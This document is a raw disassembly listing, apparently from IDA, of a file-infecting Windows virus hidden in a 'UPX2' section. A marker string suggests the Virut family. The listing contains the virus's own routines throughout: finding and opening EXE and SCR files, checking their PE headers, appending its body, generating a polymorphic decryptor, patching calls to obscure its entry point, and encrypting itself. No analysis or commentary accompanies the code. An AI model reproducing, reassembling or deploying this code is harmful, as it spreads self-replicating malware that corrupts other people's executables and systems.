jnz short loc_3144E4FE
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_3144E506
; ---------------------------------------------------------------------------
loc_3144E4FE: ; CODE XREF: UPX2:3144E4EC�j
mov al, 48h
or al, [ebp+40342Ah]
loc_3144E506: ; CODE XREF: UPX2:3144E4FC�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_3144E53A
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_3144E555
mov cl, 77h
jmp short loc_3144E555
; ---------------------------------------------------------------------------
loc_3144E53A: ; CODE XREF: UPX2:3144E513�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_3144E555: ; CODE XREF: UPX2:3144E534�j
; UPX2:3144E538�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_3144E5FF
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3144E596
mov eax, 2E876467h
loc_3144E596: ; CODE XREF: UPX2:3144E58F�j
stosd
mov eax, 0
stosw
jnz short loc_3144E5A6
mov ax, 0E58Bh
stosw
loc_3144E5A6: ; CODE XREF: UPX2:3144E59E�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_3144E5FC
test dword ptr [ebp+403431h], 8000000h
jz short loc_3144E5EE
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_3144E5E9
mov ax, 424h
stosw
jmp short loc_3144E5FC
; ---------------------------------------------------------------------------
loc_3144E5E9: ; CODE XREF: UPX2:3144E5DF�j
mov al, 8
stosb
jmp short loc_3144E5FC
; ---------------------------------------------------------------------------
loc_3144E5EE: ; CODE XREF: UPX2:3144E5C6�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_3144E5FF
; ---------------------------------------------------------------------------
loc_3144E5FC: ; CODE XREF: UPX2:3144E5BA�j
; UPX2:3144E5E7�j ...
mov al, 0C9h
stosb
loc_3144E5FF: ; CODE XREF: UPX2:3144E572�j
; UPX2:3144E5FA�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3144E62B
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_3144E62B: ; CODE XREF: UPX2:3144E609�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
test dword ptr [ebp+403431h], 20h
jz short loc_3144E696
test dword ptr [ebp+403431h], 20000000h
jz short loc_3144E65C
loc_3144E64F: ; CODE XREF: UPX2:3144E65A�j
test edi, 3
jz short loc_3144E65C
mov al, 90h
stosb
jmp short loc_3144E64F
; ---------------------------------------------------------------------------
loc_3144E65C: ; CODE XREF: UPX2:3144E64D�j
; UPX2:3144E655�j
mov eax, edi
mov ecx, [ebp+403982h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 400000h
jz short loc_3144E68A
mov ax, 0C350h
or al, [ebp+403429h]
jmp short loc_3144E694
; ---------------------------------------------------------------------------
loc_3144E68A: ; CODE XREF: UPX2:3144E67C�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
loc_3144E694: ; CODE XREF: UPX2:3144E688�j
stosw
loc_3144E696: ; CODE XREF: UPX2:3144E641�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3144E715
test dword ptr [ebp+403431h], 20000000h
jz short loc_3144E6BB
loc_3144E6AE: ; CODE XREF: UPX2:3144E6B9�j
test edi, 3
jz short loc_3144E6BB
mov al, 90h
stosb
jmp short loc_3144E6AE
; ---------------------------------------------------------------------------
loc_3144E6BB: ; CODE XREF: UPX2:3144E6AC�j
; UPX2:3144E6B4�j
mov ecx, edi
mov eax, [ebp+40399Ah]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+403431h], 800000h
jnz short loc_3144E6E4
lea eax, [ebp+403429h]
loc_3144E6DC: ; CODE XREF: UPX2:3144E6E2�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3144E6DC
loc_3144E6E4: ; CODE XREF: UPX2:3144E6D4�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3144E6F9
mov ax, 0C031h
stosw
loc_3144E6F9: ; CODE XREF: UPX2:3144E6F1�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3144E712
mov ax, 0C031h
stosw
loc_3144E712: ; CODE XREF: UPX2:3144E70A�j
mov al, 0C3h
stosb
loc_3144E715: ; CODE XREF: UPX2:3144E6A0�j
lea eax, [ebp+40343Ch]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3144E72D
push edi
sub edi, eax
pop eax
jmp short loc_3144E746
; ---------------------------------------------------------------------------
loc_3144E72D: ; CODE XREF: UPX2:3144E725�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4039A2h]
add [ebp+403982h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3144E746: ; CODE XREF: UPX2:3144E72B�j
mov [ebp+40106Dh], edi
mov edi, [ebp+403986h]
sub eax, [ebp+403982h]
test dword ptr [ebp+403431h], 40h
jz short loc_3144E766
neg eax
loc_3144E766: ; CODE XREF: UPX2:3144E762�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3144E76A proc near ; CODE XREF: sub_3144EB96+2A8�p
push esi
push edi
cmp dword ptr [ebp+4039AEh], 0
jz loc_3144E952
call near ptr loc_3144E78A+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3144E78A: ; CODE XREF: sub_3144E76A+F�p
add bh, bh
sub_3144E76A endp ; sp-analysis failed
xchg eax, ebp
mov ds:85890040h, dh
mov esi, 53004039h
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3144DEA4
mov edx, [ebp+4039A6h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+4039C2h], eax
add eax, [edx+8]
mov [ebp+4039C6h], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3144DEA4
mov edi, [ebp+4039A6h]
push esi
call sub_3144DEA4
mov edx, [ebp+4039A6h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3144E952
jz loc_3144E952
add esi, [ebp+4039AAh]
add esi, [ebp+403972h]
; START OF FUNCTION CHUNK FOR sub_3144E923
loc_3144E804: ; CODE XREF: sub_3144E923+29�j
lodsb
cmp al, 0E8h
jnz loc_3144E8AF
lea eax, [esi+4]
sub eax, [ebp+403972h]
add eax, [esi]
push eax
call sub_3144DEA4
cmp dword ptr [ebp+4039A6h], 0
jnz short loc_3144E832
cmp eax, [edi+0Ch]
jnb loc_3144E94B
jmp short loc_3144E83E
; ---------------------------------------------------------------------------
loc_3144E832: ; CODE XREF: sub_3144E923-FE�j
cmp [ebp+4039A6h], edx
jnz loc_3144E94B
loc_3144E83E: ; CODE XREF: sub_3144E923-F3�j
add eax, [ebp+403972h]
cmp word ptr [eax], 25FFh
jnz loc_3144E94B
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3144DEA4
cmp [ebp+4039A6h], edi
jnz loc_3144E94B
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3144E94B
cmp eax, [edi+8]
jnb loc_3144E94B
loc_3144E887: ; CODE XREF: sub_3144E923+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+403972h]
push edx
push eax
push dword ptr [ebp+4039BEh]
call dword ptr [ebp+403548h]
pop edx
test eax, eax
jnz loc_3144E961
jmp loc_3144E94B
; ---------------------------------------------------------------------------
loc_3144E8AF: ; CODE XREF: sub_3144E923-11C�j
cmp al, 0FFh
jnz loc_3144E94B
cmp byte ptr [esi], 15h
jnz loc_3144E94B
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3144DEA4
cmp [ebp+4039A6h], edi
jnz short loc_3144E94B
add eax, [ebp+4039AAh]
add eax, [ebp+403972h]
mov [ebp+4039CAh], eax
mov eax, [eax]
cmp eax, [ebp+4039C2h]
jb short loc_3144E8F8
cmp eax, [ebp+4039C6h]
jb short loc_3144E961
loc_3144E8F8: ; CODE XREF: sub_3144E923-35�j
cmp eax, 70000000h
jb short loc_3144E936
call sub_3144E923
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+4039CAh]
jnz short locret_3144E922
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3144E93D
; ---------------------------------------------------------------------------
locret_3144E922: ; CODE XREF: sub_3144E923-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3144E923
; =============== S U B R O U T I N E =======================================
sub_3144E923 proc near ; CODE XREF: sub_3144E923-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3144E804 SIZE 0000011F BYTES
pop dword ptr [ebp+403992h]
pusha
mov esi, [ebp+403972h]
call sub_3144DFAB
popa
loc_3144E936: ; CODE XREF: sub_3144E923-26�j
test eax, 80000000h
jnz short loc_3144E94B
loc_3144E93D: ; CODE XREF: sub_3144E923-3�j
sub eax, [edi+0Ch]
jb short loc_3144E94B
cmp eax, [edi+8]
jb loc_3144E887
loc_3144E94B: ; CODE XREF: sub_3144E923-F9�j
; sub_3144E923-EB�j ...
dec ecx
jnz loc_3144E804
loc_3144E952: ; CODE XREF: sub_3144E76A+9�j
; UPX2:3144E7EC�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_3144E99D
; ---------------------------------------------------------------------------
loc_3144E961: ; CODE XREF: sub_3144E923-7F�j
; sub_3144E923-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_3144E99D: ; CODE XREF: sub_3144E923+3C�j
pop edi
pop esi
retn
sub_3144E923 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144E9A0 proc near ; CODE XREF: UPX2:3144EB6E�p
; sub_3144EB96+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr [ebp+40357Ch]
cmp eax, 0FFFFFFFFh
jz locret_3144EA71
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_3144EA71
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_3144EF29
mov [ebp+403956h], eax
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_3144EF1D
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_3144EF1D
mov [ebp+40396Ah], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr [ebp+403560h]
test eax, eax
jz loc_3144EF1D
xor ecx, ecx
mov [ebp+40396Eh], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_3144EEF5
mov [ebp+403972h], eax
locret_3144EA71: ; CODE XREF: sub_3144E9A0+10�j
; sub_3144E9A0+27�j ...
retn
sub_3144E9A0 endp
; =============== S U B R O U T I N E =======================================
sub_3144EA72 proc near ; CODE XREF: sub_3144EB96+117�p
; sub_3144EB96+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3144EA8C
add eax, [ebp+40106Dh]
loc_3144EA8C: ; CODE XREF: sub_3144EA72+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, [ebp+40106Dh]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+403976h], eax
retn
sub_3144EA72 endp
; =============== S U B R O U T I N E =======================================
sub_3144EAB7 proc near ; CODE XREF: sub_3144EB96:loc_3144EBE5�p
; sub_3144EB96+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_3144EABC: ; CODE XREF: sub_3144EAB7+23�j
jecxz short locret_3144EAF3
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3144EAF3
cmp dword ptr [edx+0Ch], 1
jb short loc_3144EABC
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+40396Ah]
locret_3144EAF3: ; CODE XREF: sub_3144EAB7:loc_3144EABC�j
; sub_3144EAB7+1D�j ...
retn
sub_3144EAB7 endp
; =============== S U B R O U T I N E =======================================
sub_3144EAF4 proc near ; CODE XREF: UPX2:3144EB80�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3144EAF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3144EB01: ; CODE XREF: UPX2:3144EB22�j
mov ecx, edi
jmp short loc_3144EB10
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_3144EB0C: ; CODE XREF: UPX2:3144EB1E�j
mov ebx, edi
xor ecx, ecx
loc_3144EB10: ; CODE XREF: UPX2:3144EB03�j
; UPX2:3144EB26�j
lodsb
cmp al, 61h
jb short loc_3144EB1B
cmp al, 7Ah
ja short loc_3144EB1B
sub al, 20h
loc_3144EB1B: ; CODE XREF: UPX2:3144EB13�j
; UPX2:3144EB17�j
stosb
cmp al, 5Ch
jz short loc_3144EB0C
cmp al, 2Eh
jz short loc_3144EB01
cmp al, 0
jnz short loc_3144EB10
jecxz short locret_3144EAF3
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3144EB3E
cmp eax, 524353h
jnz locret_3144EA71
loc_3144EB3E: ; CODE XREF: UPX2:3144EB31�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3144EA71
cmp eax, 4E554357h
jz locret_3144EA71
cmp eax, 32334357h
jz locret_3144EA71
cmp eax, 4F545350h
jz locret_3144EA71
xor ebx, ebx
call sub_3144E9A0
jz locret_3144EA71
xor edx, edx
call sub_3144EB96
call sub_3144EAF4
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_3144EED3
; =============== S U B R O U T I N E =======================================
sub_3144EB96 proc near ; CODE XREF: UPX2:3144EB7B�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3144EED3
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3144EED3
test dword ptr [ebx+16h], 2000h
jnz loc_3144EED3
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_3144EED3
jecxz short loc_3144EBE5
cmp ecx, 101h
jbe loc_3144EED3
loc_3144EBE5: ; CODE XREF: sub_3144EB96+41�j
call sub_3144EAB7
jb loc_3144EED3
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_3144D6EF
xor [ebp+40342Fh], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_3144EC0F: ; CODE XREF: sub_3144EB96+92�j
push 20h
dec cl
pop eax
js short loc_3144EC2A
call sub_3144D6EF
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_3144EC0F
; ---------------------------------------------------------------------------
loc_3144EC2A: ; CODE XREF: sub_3144EB96+7E�j
; sub_3144EB96+CD�j ...
push 6
pop ecx
loc_3144EC30: ; CODE XREF: sub_3144EB96+B8�j
push 6
pop eax
call sub_3144D6EF
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_3144EC30
test dword ptr [ebp+403431h], 8
jnz short loc_3144EC65
cmp byte ptr [ebp+40342Bh], 1
jz short loc_3144EC2A
loc_3144EC65: ; CODE XREF: sub_3144EB96+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_3144EC8C
cmp byte ptr [ebp+403429h], 5
jz short loc_3144EC2A
cmp byte ptr [ebp+40342Ah], 5
jz short loc_3144EC2A
cmp byte ptr [ebp+40342Bh], 5
jz short loc_3144EC2A
loc_3144EC8C: ; CODE XREF: sub_3144EB96+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3144ECA1
cmp byte ptr [ebp+403429h], 2
ja short loc_3144EC2A
loc_3144ECA1: ; CODE XREF: sub_3144EB96+100�j
and dword ptr [ebp+4039AEh], 0
call loc_3144E13C
call sub_3144EA72
call sub_3144EEDC
mov ebx, [ebp+403976h]
call sub_3144E9A0
jz loc_3144EED3
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3144EAB7
jb loc_3144EED3
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_3144ED09
lea esi, [ebp+40343Ch]
mov ecx, [ebp+40106Dh]
rep movsb
loc_3144ED09: ; CODE XREF: sub_3144EB96+163�j
push edi
mov ecx, 90Fh
lea esi, [ebp+401000h]
rep movsd
mov cl, 0
jecxz short loc_3144ED1D
rep movsb
loc_3144ED1D: ; CODE XREF: sub_3144EB96+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_3144EDD5
push dword ptr [ebx+28h]
call sub_3144DEA4
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_3144EDD5
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3144ED5A
xor ecx, ecx
loc_3144ED5A: ; CODE XREF: sub_3144EB96+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_3144EDC1
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_3144ED9A
neg dword ptr [eax]
loc_3144ED9A: ; CODE XREF: sub_3144EB96+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_3144EDB8
neg dword ptr [eax]
loc_3144EDB8: ; CODE XREF: sub_3144EB96+21E�j
push ecx
call sub_3144EA72
pop ecx
jmp short loc_3144EDCD
; ---------------------------------------------------------------------------
loc_3144EDC1: ; CODE XREF: sub_3144EB96+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3144EDCD: ; CODE XREF: sub_3144EB96+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_3144EDD5: ; CODE XREF: sub_3144EB96+191�j
; sub_3144EB96+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, [ebp+40342Fh]
jnz short loc_3144EDEE
imul edx, 12345678h
loc_3144EDEE: ; CODE XREF: sub_3144EB96+250�j
mov [eax-1], dl
call sub_3144CDC2
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_3144EE1F
mov [ebp+4039AEh], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_3144EE1F: ; CODE XREF: sub_3144EB96+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3144EE44
push edx
call sub_3144E76A
pop edx
loc_3144EE44: ; CODE XREF: sub_3144EB96+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_3144EE4F
mov [ebx+28h], ecx
loc_3144EE4F: ; CODE XREF: sub_3144EB96+2B4�j
mov ecx, [edx+10h]
mov eax, [ebp+403976h]
cmp [edx+8], ecx
jnb short loc_3144EE60
mov [edx+8], ecx
loc_3144EE60: ; CODE XREF: sub_3144EB96+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+40342Fh]
test dword ptr [ebp+403431h], 10000000h
jz short loc_3144EE91
add ecx, [ebp+40106Dh]
loc_3144EE91: ; CODE XREF: sub_3144EB96+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_3144EEB3
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_3144EEB3
mov dh, [ebp+403430h]
loc_3144EEB3: ; CODE XREF: sub_3144EB96+307�j
; sub_3144EB96+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_3144EECA
loc_3144EEBF: ; CODE XREF: sub_3144EB96+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3144EEBF
jmp short loc_3144EED3
; ---------------------------------------------------------------------------
loc_3144EECA: ; CODE XREF: sub_3144EB96+327�j
; sub_3144EB96+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3144EECA
loc_3144EED3: ; CODE XREF: UPX2:3144EB91�j
; sub_3144EB96+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3144EB96 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144EEDC proc near ; CODE XREF: sub_3144EB96+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_3144EA71
push dword ptr [ebp+403972h]
call dword ptr [ebp+4035C4h]
loc_3144EEF5: ; CODE XREF: sub_3144E9A0+C5�j
push dword ptr [ebp+40396Eh]
call dword ptr [ebp+40353Ch]
lea ecx, [ebp+40395Ah]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_3144EF1D: ; CODE XREF: sub_3144E9A0+6B�j
; sub_3144E9A0+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_3144EF29: ; CODE XREF: sub_3144E9A0+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_3144EEDC endp
; ---------------------------------------------------------------------------
dd 0E8h, 16A5D00h, 3349ED81h, 0F0580040h, 8085C10Fh, 85004015h
dd 0C883C3C0h, 0C10FF0FFh, 40158085h, 103DC300h, 75002A00h
dd 7C81661Ch, 716C0C24h, 0E8601375h, 0FFFFFFC4h, 7EE80575h
dd 0E8FFFFFBh, 0FFFFFFD2h, 2DFF2E61h, 12345678h, 25B8h
dd 0A5E86000h, 75FFFFFFh, 24448B39h, 4EB58D30h, 8B004038h
dd 81660850h, 7302063Ah, 685625h, 8B00FF00h, 52006AC4h
dd 0F895FF50h, 83004035h, 3E8108C4h, 5C3F3F5Ch, 0C6830375h
dd 0FB2BE804h, 7FE8FFFFh, 61FFFFFFh, 74B8C3h, 0B1EB0000h
dd 2FB8h, 10E800h, 20C20000h, 30B800h, 3E80000h, 0C2000000h
dd 548D0024h, 2ECD0C24h, 7C00F883h, 0E86019h, 8B000000h
dd 5D302454h, 0ED811A8Bh, 403413h, 0FFE539E8h, 4C261FFh
dd 7030200h, 4050106h, 0AFBF5C5Dh, 9415FF15h, 90010011h
; ---------------------------------------------------------------------------
cmc
xchg ebx, ebx
push ebp
mov ebp, esp
call loc_3144F05E
mov ebx, ebx
call near ptr word_3144F116
xchg ebx, ebx
xchg ebx, ebx
mov ebp, 0
jmp short $+2
jmp loc_3144F08F
; ---------------------------------------------------------------------------
loc_3144F05E: ; CODE XREF: UPX2:3144F042�p
push dword ptr fs:0
mov fs:0, esp
xor dword ptr ds:loc_3144A016+1, ebp
xchg ebx, ebx
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push 800h
push 80000000h
push ecx
push 2
push ecx
call ds:dword_31438090 ; GetProcAddress
loc_3144F08F: ; CODE XREF: UPX2:3144F059�j
mov ebx, [ebp-8]
mov fs:0, ebx
stc
jmp short $+2
sub eax, eax
loc_3144F09D: ; CODE XREF: UPX2:3144F0A3�j
dec al
or al, al
jz short loc_3144F0A7
jnz short loc_3144F09D
jmp short near ptr word_3144F10E
; ---------------------------------------------------------------------------
loc_3144F0A7: ; CODE XREF: UPX2:3144F0A1�j
xchg ebx, ebx
clc
xchg eax, [eax]
; ---------------------------------------------------------------------------
dd 18h dup(0)
db 2 dup(0)
word_3144F10E dw 0 ; CODE XREF: UPX2:3144F0A5�j
dd 0
db 2 dup(0)
word_3144F116 dw 0 ; CODE XREF: UPX2:3144F049�p
dd 9 dup(0)
dd 7C809B47h, 7C8308ADh, 7C910331h, 7C80ADA0h, 3 dup(0)
dd 7C80BDB6h, 7C801A24h, 7C80945Ch, 7C802367h, 7C81042Ch
dd 7C810637h, 7C864B0Fh, 7C80C058h, 7C80E7ECh, 7C81153Ch
dd 7C810A77h, 7C831C45h, 7C80B6A1h, 7C8608FFh, 7C835DCAh
dd 7C8111DAh, 7C812ADEh, 7C801D77h, 7C80B905h, 7C80BB76h
dd 7C8309E1h, 7C863DE5h, 7C863F58h, 7C812782h, 7C831CB8h
dd 7C802442h, 7C810B1Ch, 7C80B974h, 7C809A51h, 7C810D87h
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
dd 380036h, 3144F258h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 0A10000h, 0Ch dup(0)
dd 90000000h, 7FFDh, 2692h dup(0)
UPX2 ends
; Section 4. (virtual address 00029000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00029000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31459000h
align 2000h
_idata2 ends
end start